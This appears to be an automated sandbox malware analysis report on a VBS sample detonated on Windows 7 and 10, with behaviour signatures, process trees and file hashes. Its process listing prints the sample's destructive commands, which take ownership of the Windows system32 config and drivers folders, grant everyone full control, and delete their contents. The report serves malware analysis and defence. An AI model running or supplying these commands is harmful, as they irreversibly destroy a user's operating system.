Malware Analysis Report

2024-11-16 12:51

Sample ID 240815-1dg3eazfkj
Target file.vbs
SHA256 9f64109481421d805229faf288c8d0a2cb648aade6acccd0b0cf4aba1f26df27
Tags
discovery exploit
score
8/10


Analysis Overview

score
8/10

SHA256

9f64109481421d805229faf288c8d0a2cb648aade6acccd0b0cf4aba1f26df27

Threat Level: Likely malicious

The file file.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Checks computer location settings

Modifies file permissions

Enumerates physical storage devices

Modifies registry class

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-15 21:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-15 21:31

Reported

2024-08-15 21:34

Platform

win7-20240708-en

Max time kernel

121s

Max time network

125s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\Notepad.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1664 wrote to memory of 568 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 568 wrote to memory of 2760 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 568 wrote to memory of 2984 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2760 wrote to memory of 2656 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2984 wrote to memory of 2672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2760 wrote to memory of 2728 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2984 wrote to memory of 2232 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\System32\Notepad.exe

"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\UnprotectAssert.vbs

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\thescript.vbs

MD5 b39eb8682deec9c7a7edcb64512655b0
SHA1 d412384d9cfd8ec2333146eb1dd6c137543dabc7
SHA256 9f64109481421d805229faf288c8d0a2cb648aade6acccd0b0cf4aba1f26df27
SHA512 539eaf53ac7f79416519742ba365d0e5d4c8ebc78ba59d8cf5b6f677e7f35fe99d42c3802245d7c5a68e7377d9b88a528fa495fc5b45a01f467fa5705a4af625

C:\Users\Admin\Desktop\ConvertFromImport.vbs

MD5 4b91264568ac2162700be36338c095e8
SHA1 c95726edf8303e6adabcb12ffdca90b51349990a
SHA256 2c8545e54e8fbc28791314d7327886237c66b70640d069f276a35b6c3322c037
SHA512 e57319453e5da3407ccc77cb3ee6200592e1916932cae467bbf77722f3ff49e5853b4b4d2eeb3092dbb2e22346f56617cc785744771bb3648bf4561feb0e9e1b

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-15 21:31

Reported

2024-08-15 21:34

Platform

win10v2004-20240802-en

Max time kernel

139s

Max time network

133s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

Network


Files

C:\Users\Admin\AppData\Local\Temp\thescript.vbs

MD5 b39eb8682deec9c7a7edcb64512655b0
SHA1 d412384d9cfd8ec2333146eb1dd6c137543dabc7
SHA256 9f64109481421d805229faf288c8d0a2cb648aade6acccd0b0cf4aba1f26df27
SHA512 539eaf53ac7f79416519742ba365d0e5d4c8ebc78ba59d8cf5b6f677e7f35fe99d42c3802245d7c5a68e7377d9b88a528fa495fc5b45a01f467fa5705a4af625

C:\Users\Admin\Desktop\CheckpointWait.vbs

MD5 4b91264568ac2162700be36338c095e8
SHA1 c95726edf8303e6adabcb12ffdca90b51349990a
SHA256 2c8545e54e8fbc28791314d7327886237c66b70640d069f276a35b6c3322c037
SHA512 e57319453e5da3407ccc77cb3ee6200592e1916932cae467bbf77722f3ff49e5853b4b4d2eeb3092dbb2e22346f56617cc785744771bb3648bf4561feb0e9e1b